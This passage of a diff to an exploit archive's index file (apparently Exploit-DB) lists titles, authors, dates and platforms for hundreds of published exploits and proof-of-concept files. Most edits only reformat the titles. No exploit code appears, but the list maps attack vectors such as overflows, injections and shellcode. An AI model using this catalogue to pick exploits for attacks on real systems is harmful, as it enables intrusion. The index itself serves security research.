Disclosure",2003-02-20,euronymous,windows,remote,0 22270,platforms/windows/remote/22270.txt,"Sage 1.0 beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote,0 -22271,platforms/hardware/remote/22271.c,"Cisco IOS 11/12 OSPF Neighbor Buffer Overflow",2003-02-20,FX,hardware,remote,0 -22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 Code Obfuscation Weakness",2002-02-22,"Simon Cozens",multiple,local,0 +22271,platforms/hardware/remote/22271.c,"Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow",2003-02-20,FX,hardware,remote,0 +22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation Weakness",2002-02-22,"Simon Cozens",multiple,local,0 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 22274,platforms/linux/remote/22274.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (2)",2003-02-23,CrZ,linux,remote,0 22275,platforms/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access",2003-02-20,"Carl Livitt",linux,remote,0 22276,platforms/php/webapps/22276.txt,"Nuked-Klan 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0 22277,platforms/php/webapps/22277.txt,"Nuked-Klan 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 -22278,platforms/linux/remote/22278.pl,"moxftp 2.2 Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 +22278,platforms/linux/remote/22278.pl,"moxftp 2.2 - Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,windows,remote,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0 22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 - shownews.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - search.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 - comments.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 -22286,platforms/unix/dos/22286.html,"Netscape 6.0/7.0 Style Sheet Denial of Service",2003-02-25,Jocke,unix,dos,0 -22287,platforms/unix/dos/22287.html,"Netscape 7.0 JavaScript Regular Expression Denial of Service",2003-02-25,dwm,unix,dos,0 +22286,platforms/unix/dos/22286.html,"Netscape 6.0/7.0 - Style Sheet Denial of Service",2003-02-25,Jocke,unix,dos,0 +22287,platforms/unix/dos/22287.html,"Netscape 7.0 - JavaScript Regular Expression Denial of Service",2003-02-25,dwm,unix,dos,0 22288,platforms/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 - Self Executing HTML File",2003-02-25,http-equiv,windows,remote,0 22289,platforms/windows/remote/22289.c,"Microsoft Windows XP/ME - Help and Support Center Buffer Overflow",2003-02-26,s0h,windows,remote,0 22290,platforms/windows/dos/22290.c,"Electronic Arts Battlefield 1942 1.2/1.3 - Remote Administration Authentication Buffer Overflow",2003-02-26,greuff,windows,dos,0 22291,platforms/linux/remote/22291.c,"AMX Mod 0.9.2 - Remote 'amx_say' Format String",2003-02-26,greuff,linux,remote,0 -22292,platforms/unix/remote/22292.pl,"Frisk F-Prot Antivirus 3.12 b Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",unix,remote,0 +22292,platforms/unix/remote/22292.pl,"Frisk F-Prot Antivirus 3.12 b - Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",unix,remote,0 22293,platforms/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,php,webapps,0 22294,platforms/linux/dos/22294.c,"TCPDump 3.x - Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",linux,dos,0 22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 - ipchat.php Remote File Inclusion",2003-02-27,frog,php,webapps,0 @@ -19555,15 +19551,15 @@ id,file,description,date,author,platform,type,port 22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 - Translations.php Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 22300,platforms/php/webapps/22300.txt,"WordPress Easy Webinar Plugin - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF",2012-10-28,b33f,windows,remote,0 -22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 +22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 - IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - (WinHlp32.exe) Crash PoC",2012-10-28,coolkaveh,windows,dos,0 22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection",2012-10-28,Metasploit,multiple,remote,0 22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow",2012-10-29,Metasploit,windows,remote,0 22330,platforms/windows/dos/22330.txt,"Microsoft Office Excel 2010 - Crash PoC",2012-10-29,coolkaveh,windows,dos,0 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 -22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0 -22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0 +22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0 +22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0 22310,platforms/windows/dos/22310.txt,"Microsoft Office Publisher 2010 - Crash PoC",2012-10-28,coolkaveh,windows,dos,0 22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 22311,platforms/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - Command.CGI File Creation",2003-02-28,"Martin Eiszner",cgi,remote,0 @@ -19596,12 +19592,12 @@ id,file,description,date,author,platform,type,port 22343,platforms/php/webapps/22343.txt,"VPOPMail 0.9x - vpopmail.php Remote Command Execution",2003-03-11,ERRor,php,webapps,0 22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0 22345,platforms/multiple/dos/22345.txt,"Multitech RouteFinder 550 - Remote Memory Corruption",2003-03-11,"Peter Kruse",multiple,dos,0 -22346,platforms/linux/remote/22346.c,"PGP4Pine 1.75.6/1.76 Long Message Line Buffer Overflow",2003-03-12,"Eric AUGE",linux,remote,0 +22346,platforms/linux/remote/22346.c,"PGP4Pine 1.75.6/1.76 - Long Message Line Buffer Overflow",2003-03-12,"Eric AUGE",linux,remote,0 22347,platforms/php/webapps/22347.txt,"PHP-Nuke 5.5/6.0 AvantGo Module - Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 22348,platforms/php/webapps/22348.txt,"PHP-Nuke 5.5/6.0 News Module - Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 22349,platforms/php/webapps/22349.txt,"PHP-Nuke Splatt Forum 3.2 Module - Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 22350,platforms/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",hardware,remote,0 -22351,platforms/windows/remote/22351.py,"Freefloat FTP Server PUT Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 +22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - PUT Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 22352,platforms/linux/dos/22352.txt,"TCPDump 3.6/3.7 - Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",linux,dos,0 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote Send_CTCP() Memory Corruption",2003-03-06,eSDee,linux,remote,0 22354,platforms/windows/local/22354.c,"Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 @@ -19627,22 +19623,22 @@ id,file,description,date,author,platform,type,port 22374,platforms/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",linux,local,0 -22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 +22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 - Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 - Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 22379,platforms/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun",2003-03-13,CrZ,linux,remote,0 22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps,0 22381,platforms/multiple/remote/22381.txt,"SIPS 0.2.2 - User Information Disclosure",2003-03-18,dwcgr0up,multiple,remote,0 22382,platforms/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - index.php Cross-Site Scripting",2003-03-18,"Ertan Kurt",php,webapps,0 -22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 +22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22384,platforms/php/webapps/22384.txt,"Siteframe 2.2.4 - search.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22385,platforms/php/webapps/22385.txt,"Basit 1.0 - Search Module Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22386,platforms/php/webapps/22386.txt,"Siteframe 2.2.4 - Download.php Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0 22387,platforms/php/webapps/22387.txt,"DCP-Portal 5.3.1 - Calendar.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22388,platforms/multiple/remote/22388.txt,"WFChat 1.0 - Information Disclosure",2003-03-19,subj,multiple,remote,0 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 -22390,platforms/windows/dos/22390.c,"Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",windows,dos,0 +22390,platforms/windows/dos/22390.c,"Microsoft ActiveSync 3.5 - Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",windows,dos,0 22391,platforms/php/webapps/22391.txt,"OSCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 -22392,platforms/php/webapps/22392.txt,"OSCommerce 2.1/2.2 Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 +22392,platforms/php/webapps/22392.txt,"OSCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22393,platforms/php/webapps/22393.txt,"OSCommerce 2.1/2.2 - Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22394,platforms/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",hardware,remote,0 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 @@ -19668,7 +19664,7 @@ id,file,description,date,author,platform,type,port 22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",windows,dos,0 22418,platforms/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (2)",2003-04-30,ThreaT,windows,remote,0 22419,platforms/php/dos/22419.php,"PHP 4.3 - socket_iovec_alloc() Integer Overflow",2003-03-25,"Sir Mordred",php,dos,0 -22420,platforms/windows/dos/22420.txt,"Emule 0.27 b Empty Nickname Chat Request Denial of Service",2003-03-25,"Auriemma Luigi",windows,dos,0 +22420,platforms/windows/dos/22420.txt,"Emule 0.27 b - Empty Nickname Chat Request Denial of Service",2003-03-25,"Auriemma Luigi",windows,dos,0 22421,platforms/php/webapps/22421.txt,"Web Chat Manager 2.0 - HTML Code Injection",2003-03-25,Over_G,php,webapps,0 22422,platforms/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon - Viewpage.php File Disclosure",2003-03-25,"Zero-X www.lobnan.de Team",php,webapps,0 22423,platforms/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - Viewtopic.php SQL Injection",2003-03-25,frog,php,webapps,0 @@ -19681,30 +19677,30 @@ id,file,description,date,author,platform,type,port 22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,Metasploit,windows,remote,0 -22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",linux,dos,0 +22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 - Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",linux,dos,0 22434,platforms/windows/remote/22434.txt,"Sambar Server 5.x - Information Disclosure",2003-03-27,"gregory Le Bras",windows,remote,0 22435,platforms/php/dos/22435.php,"PHP 4.3.x/5.0 - openlog() Buffer Overflow",2003-03-27,sir.mordred@hushmail.com,php,dos,0 22436,platforms/asp/webapps/22436.txt,"MyGuestBK - Add.asp Cross-Site Scripting",2002-03-27,Over_G,asp,webapps,0 -22437,platforms/asp/webapps/22437.txt,"MyGuestBK Unauthorized Admin Panel Access",2002-03-27,Over_G,asp,webapps,0 -22438,platforms/php/webapps/22438.txt,"PostNuke 0.72x Stats Module Path Disclosure",2003-03-28,rkc,php,webapps,0 -22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module Path Disclosure",2003-03-28,rkc,php,webapps,0 +22437,platforms/asp/webapps/22437.txt,"MyGuestBK - Unauthorized Admin Panel Access",2002-03-27,Over_G,asp,webapps,0 +22438,platforms/php/webapps/22438.txt,"PostNuke 0.72x Stats Module - Path Disclosure",2003-03-28,rkc,php,webapps,0 +22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Path Disclosure",2003-03-28,rkc,php,webapps,0 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0 22442,platforms/unix/remote/22442.c,"SendMail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0 22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Path Disclosure",2003-03-29,euronymous,php,webapps,0 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Path Disclosure",2003-03-29,euronymous,php,webapps,0 -22446,platforms/linux/dos/22446.txt,"EZ Server 1.0 Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",linux,dos,0 +22446,platforms/linux/dos/22446.txt,"EZ Server 1.0 - Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",linux,dos,0 22447,platforms/windows/dos/22447.txt,"HP Instant TopTools 5.0 - Remote Denial of Service",2003-03-31,"Erik Parker",windows,dos,0 -22448,platforms/windows/remote/22448.txt,"BEA WebLogic 7.0 Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",windows,remote,0 +22448,platforms/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",windows,remote,0 22449,platforms/unix/remote/22449.c,"Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,unix,remote,0 22450,platforms/unix/remote/22450.c,"Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,unix,remote,0 22451,platforms/php/webapps/22451.txt,"Phorum 3.4 - Email Subject Line Script Injection",2003-04-02,peter,php,webapps,0 22452,platforms/linux/local/22452.sh,"ChiTeX 6.1.2 - Local Privilege Escalation",2003-04-03,zillion,linux,local,0 -22453,platforms/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure",2003-04-03,stickler,hardware,remote,0 +22453,platforms/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,hardware,remote,0 22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0 -22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router Rule Bypass",2003-04-03,stickler,hardware,remote,0 -22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness",2003-04-03,"Carl Livitt",linux,local,0 +22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0 +22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 - Symbolic Link Following Configuration File Weakness",2003-04-03,"Carl Livitt",linux,local,0 22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 - Index.php File Disclosure",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 22458,platforms/linux/local/22458.c,"Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence Weakness",2003-04-04,"Andrew Griffiths",linux,local,0 22459,platforms/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 - Index.php LNG File Disclosure",2003-04-04,"Albert Puigsech Galicia",php,webapps,0 @@ -19720,23 +19716,23 @@ id,file,description,date,author,platform,type,port 22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote,0 22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote,0 22471,platforms/unix/remote/22471.txt,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)",2003-04-07,noir,unix,remote,0 -22472,platforms/multiple/remote/22472.txt,"Vignette StoryServer 4.1 Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,multiple,remote,0 -22473,platforms/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 PHP Code Injection",2003-04-07,"Berend-Jan Wever",php,webapps,0 +22472,platforms/multiple/remote/22472.txt,"Vignette StoryServer 4.1 - Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,multiple,remote,0 +22473,platforms/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",php,webapps,0 22474,platforms/php/webapps/22474.txt,"Py-Membres 4.0 - SQL Injection",2003-04-07,frog,php,webapps,0 -22475,platforms/unix/remote/22475.txt,"Amavis 0.1.6 Header Parsing Mail Relaying Weakness",2003-04-08,"Phil Cyc",unix,remote,0 +22475,platforms/unix/remote/22475.txt,"Amavis 0.1.6 - Header Parsing Mail Relaying Weakness",2003-04-08,"Phil Cyc",unix,remote,0 22476,platforms/windows/remote/22476.txt,"QuickFront 1.0 - File Disclosure",2003-04-09,"Jan Kachlik",windows,remote,0 22477,platforms/php/webapps/22477.txt,"PHPay 2.2 - Multiple Path Disclosure Vulnerabilities",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 22478,platforms/php/webapps/22478.txt,"PHPay 2.2 - Cross-Site Scripting",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 22479,platforms/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote Buffer Overflow",2003-04-09,"John Leach",linux,remote,0 -22480,platforms/hardware/remote/22480.txt,"Linksys BEFVP4 SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",hardware,remote,0 -22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 Sensitive Information Disclosure Weakness",2002-04-10,Over_G,cgi,webapps,0 -22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 Sensitive Information Disclosure Weakness",2003-04-10,Over_G,cgi,webapps,0 +22480,platforms/hardware/remote/22480.txt,"Linksys BEFVP4 - SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",hardware,remote,0 +22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure Weakness",2002-04-10,Over_G,cgi,webapps,0 +22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure Weakness",2003-04-10,Over_G,cgi,webapps,0 22483,platforms/osx/dos/22483.c,"MacOS X 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 -22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 -22485,platforms/linux/remote/22485.c,"SheerDNS 1.0 Information Disclosure",2003-04-14,"Jedi/Sector One",linux,remote,0 +22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 +22485,platforms/linux/remote/22485.c,"SheerDNS 1.0 - Information Disclosure",2003-04-14,"Jedi/Sector One",linux,remote,0 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 - Index.CFM SQL Injection",2003-04-14,"Jim Dew",cfm,webapps,0 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 - Information Disclosure",2003-04-14,drG4njubas,asp,webapps,0 -22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure",2003-04-15,"gregory Le Bras",windows,remote,0 +22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 - site.ini Information Disclosure",2003-04-15,"gregory Le Bras",windows,remote,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 22490,platforms/multiple/webapps/22490.txt,"ZPanel 10.0.1 - CSRF / XSS / SQLi / Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 @@ -19744,14 +19740,14 @@ id,file,description,date,author,platform,type,port 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 22494,platforms/php/dos/22494.txt,"OSCommerce 2.2 - Product_Info.php Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 -22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,multiple,remote,0 +22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 - Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,multiple,remote,0 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Path Disclosure",2003-04-11,"Dennis Rand",multiple,remote,0 22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22499,platforms/cgi/webapps/22499.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)",2003-04-15,"Nick Cleaton",cgi,webapps,0 22500,platforms/cgi/webapps/22500.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)",2003-05-05,snooq,cgi,webapps,0 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,multiple,dos,0 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service (2)",2003-04-16,"Shashank pandey",multiple,dos,0 -22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 Information Disclosure Weakness",2003-04-16,"Ziv Kamir",windows,remote,0 +22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 - Information Disclosure Weakness",2003-04-16,"Ziv Kamir",windows,remote,0 22505,platforms/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - NULL Pointer Dereference Denial of Service",2003-04-16,zillion,multiple,dos,0 22506,platforms/windows/remote/22506.txt,"EZ Server 1.0 - File Disclosure",2003-04-17,"gregory Le Bras",windows,remote,0 22507,platforms/asp/webapps/22507.txt,"Web Wiz Forum 6.34 - Information Disclosure",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps,0 @@ -19759,7 +19755,7 @@ id,file,description,date,author,platform,type,port 22509,platforms/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote,0 22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - Ext.DLL Command Execution",2003-04-20,"Matthew Murphy",windows,remote,0 22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorization Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos,0 -22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0 +22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps,0 22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String",2003-04-21,"Matthew Murphy",multiple,dos,0 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 @@ -19782,9 +19778,9 @@ id,file,description,date,author,platform,type,port 22533,platforms/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",hardware,remote,0 22534,platforms/php/webapps/22534.txt,"Truegalerie 1.0 - Unauthorized Administrative Access",2003-04-25,frog,php,webapps,0 22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0 -22536,platforms/multiple/dos/22536.txt,"Opera 7.10 Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos,0 -22537,platforms/linux/dos/22537.c,"Libopt.a 3.1x Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos,0 -22538,platforms/linux/local/22538.pl,"Libopt.a 3.1x Error Logging Buffer Overflow (2)",2003-04-24,jlanthea,linux,local,0 +22536,platforms/multiple/dos/22536.txt,"Opera 7.10 - Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos,0 +22537,platforms/linux/dos/22537.c,"Libopt.a 3.1x - Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos,0 +22538,platforms/linux/local/22538.pl,"Libopt.a 3.1x - Error Logging Buffer Overflow 